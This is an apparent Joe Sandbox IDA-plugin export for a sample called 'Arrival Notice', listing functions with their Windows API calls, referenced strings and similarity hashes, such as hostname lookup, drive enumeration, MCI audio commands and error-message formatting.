Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1976180769-4113822522
Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A

Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00432A23
_wcslen.LIBCMT ref: 00432A34
_wcslen.LIBCMT ref: 00432A72
_wcsncpy.LIBCMT ref: 00432A86
_wcslen.LIBCMT ref: 00432AA3
_wcsncpy.LIBCMT ref: 00432AB7
_wcslen.LIBCMT ref: 00432AD3
_wcsncpy.LIBCMT ref: 00432A56

Part of subcall function 00413190: __fassign.LIBCMT ref: 00413186

_wcslen.LIBCMT ref: 00432AE3
_wcsncpy.LIBCMT ref: 00432AFB
_wcslen.LIBCMT ref: 00432B1C
_wcsncpy.LIBCMT ref: 00432B30
_wcslen.LIBCMT ref: 00432B4B
_wcsncpy.LIBCMT ref: 00432B5F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$_wcsncpy$LocalTime__fassign
String ID:
API String ID: 461458858-0
Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9

Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
GlobalLock.KERNEL32(00000000), ref: 004300F6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
GlobalUnlock.KERNEL32(00000000), ref: 0043010C
CloseHandle.KERNEL32(00000000), ref: 00430113
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
GlobalFree.KERNEL32(00000000), ref: 00430150
GetObjectW.GDI32(?,00000018,?), ref: 00430177
CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
DeleteObject.GDI32(?), ref: 004301D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68

Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 0045522E
DeleteMenu.USER32(?,?,00000000), ref: 0045529A
DeleteMenu.USER32(?,?,00000000), ref: 004552B0
GetMenuItemCount.USER32(?), ref: 004552C1
SetMenu.USER32(?,00000000), ref: 004552CF
DestroyMenu.USER32(?,?,00000000), ref: 004552DC
DrawMenuBar.USER32 ref: 004552EF
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Strings

0, xrefs: 00455207

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
String ID: 0
API String ID: 956284711-4108050209
Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9

Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004334B0
gethostname.WSOCK32(?,00000100), ref: 004334CA
gethostbyname.WSOCK32(?), ref: 004334D7
_wcscpy.LIBCMT ref: 00433506
WSACleanup.WSOCK32 ref: 0043350E
_memmove.LIBCMT ref: 00433525
inet_ntoa.WSOCK32(?), ref: 00433531
_strcat.LIBCMT ref: 0043353F
_wcscpy.LIBCMT ref: 00433556
WSACleanup.WSOCK32 ref: 00433564
_wcscpy.LIBCMT ref: 00433576

Strings

0.0.0.0, xrefs: 00433500

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 1965227024-3771769585
Opcode ID: 03f87254d8d51c9da7a526667564e0f25ce075e20d9ffafd092500c411c1bb4f
Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
Opcode Fuzzy Hash: 03f87254d8d51c9da7a526667564e0f25ce075e20d9ffafd092500c411c1bb4f
Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8

Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634

Strings

play PlayMe wait, xrefs: 0045F60C
close PlayMe, xrefs: 0045F5E7, 0045F619
play PlayMe, xrefs: 0045F62F
status PlayMe mode, xrefs: 0045F5D0
alias PlayMe, xrefs: 0045F5AF
open , xrefs: 0045F584

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: SendString$_memmove_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 369157077-1007645807
Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D

Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00445BF8
GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
__wcsicoll.LIBCMT ref: 00445C33
__wcsicoll.LIBCMT ref: 00445C4F
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9

Strings

list, xrefs: 00445C8B
SHELLDLL_DefView, xrefs: 00445C19
largeicons, xrefs: 00445C2D
smallicons, xrefs: 00445C65
details, xrefs: 00445C49

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll$ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 3125838495-3381328864
Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9

Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
SendMessageW.USER32(?,?,00000000,?), ref: 00449332
SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
SendMessageW.USER32(?,00000402,?), ref: 00449399
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4

Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C

Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0

GetDriveTypeW.KERNEL32(?), ref: 004787B9
_wcscpy.LIBCMT ref: 004787E5

Strings

a, xrefs: 0047878B
\VH, xrefs: 004787CD
all, xrefs: 004786BB
removable, xrefs: 004786FB
cdrom, xrefs: 004786DB
unknown, xrefs: 0047876F
fixed, xrefs: 00478718
network, xrefs: 00478735
ramdisk, xrefs: 00478752

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy_wcslen
String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 3052893215-2127371420
Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB

Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
__swprintf.LIBCMT ref: 0045E7F7
_wprintf.LIBCMT ref: 0045E8B3
_wprintf.LIBCMT ref: 0045E8D7

Strings

%s (%d) : ==> %s:, xrefs: 0045E8D2
^ ERROR, xrefs: 0045E851
%s (%d) : ==> %s:%s%s, xrefs: 0045E8AE
Error: , xrefs: 0045E87A
Line %d (File "%s"):, xrefs: 0045E7F1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2295938435-2354261254
Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8

Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 004531E9
__i64tow.LIBCMT ref: 00453206
__swprintf.LIBCMT ref: 00453227
__swprintf.LIBCMT ref: 00453243
_wcscpy.LIBCMT ref: 00453261
_wcscpy.LIBCMT ref: 0045329D

Strings

0x%p, xrefs: 0045323D
%.15g, xrefs: 00453221
True, xrefs: 0045325B
False, xrefs: 00453274

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __swprintf_wcscpy$__i64tow__itow
String ID: %.15g$0x%p$False$True
API String ID: 3038501623-2263619337
Opcode ID: 6de1652b6130fa33223f4e17548c0c4421bade96c985e506a034d386b34cdb92
Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
Opcode Fuzzy Hash: 6de1652b6130fa33223f4e17548c0c4421bade96c985e506a034d386b34cdb92
Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A

Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
__swprintf.LIBCMT ref: 0045E5F6
_wprintf.LIBCMT ref: 0045E6A3
_wprintf.LIBCMT ref: 0045E6C7

Strings

%s (%d) : ==> %s:, xrefs: 0045E6C2
%s (%d) : ==> %s:%s%s, xrefs: 0045E69E
Error: , xrefs: 0045E66A
^ ERROR , xrefs: 0045E639
Line %d (File "%s"):, xrefs: 0045E5F0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2295938435-8599901
Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8

Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00443B67

Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620

Sleep.KERNEL32(0000000A), ref: 00443B9F
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
SetActiveWindow.USER32(00000000), ref: 00443BEC
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
Sleep.KERNEL32(000000FA), ref: 00443C2D
IsWindow.USER32(00000000), ref: 00443C3A
EndDialog.USER32(00000000,00000000), ref: 00443C4C

Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2

EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B

Strings

BUTTON, xrefs: 00443BB9

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
String ID: BUTTON
API String ID: 1834419854-3405671355
Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C

Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
LoadStringW.USER32(00000000), ref: 00454040

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

_wprintf.LIBCMT ref: 00454074
__swprintf.LIBCMT ref: 004540A3
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F

Strings

Error: , xrefs: 004540DE
Line %d:, xrefs: 0045409D
%s (%d) : ==> %s.: %s %s, xrefs: 0045406F
., xrefs: 004540F4
Line %d (File "%s"):, xrefs: 004540B8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
